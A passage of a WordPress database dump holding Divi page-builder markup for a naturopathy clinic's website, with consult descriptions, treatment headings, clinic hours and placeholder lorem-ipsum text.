_builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\" sticky_enabled=\"0\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Initial consult (90 min)\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" title_text=\"Icon\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. Pathology testing or referrals may be recommended. Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Follow-up consult (50 min)\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" title_text=\"5-01\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. </span></p>[/et_pb_blurb][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" custom_padding=\"||0px|||\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_5\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Naturopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Relaxation Massage\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Meditatoin\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Acupuncture\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Don\'t wait to make the shift to a more holistic approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Cras ultricies ligula sed magna dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec rutrum congue leo eget malesuada. Nulla porttitor accumsan tincidunt. Curabitur aliquet quam id dui posuere blandit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.</span></p>\n<p><span style=\"font-family: Montserrat;\">Donec rutrum congue leo eget malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. Pellentesque in ipsum id orci porta dapibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur aliquet quam id dui posuere blandit. Quisque velit nisi, pretium ut lacinia in elementum.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-46.png\" title_text=\"holistic-healer-46\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.4.8\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 12:39:32','2021-05-24 04:39:32','',28,'https://verde.desidrivers.com.au/?p=99',0,'revision','',0),(101,1,'2021-05-24 12:55:44','2021-05-24 04:55:44','','3-01','','inherit','open','closed','','3-01','','','2021-05-24 12:55:44','2021-05-24 04:55:44','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.jpg',0,'attachment','image/jpeg',0),(102,1,'2021-05-24 12:56:49','2021-05-24 04:56:49','','Icon','','inherit','open','closed','','icon-2','','','2021-05-24 12:56:49','2021-05-24 04:56:49','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.jpg',0,'attachment','image/jpeg',0),(103,1,'2021-05-24 12:58:23','2021-05-24 04:58:23','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" inline_fonts=\"Montserrat,Playfair Display\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Verde Naturopathy offers both face-to-face and online Zoom consultations.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" 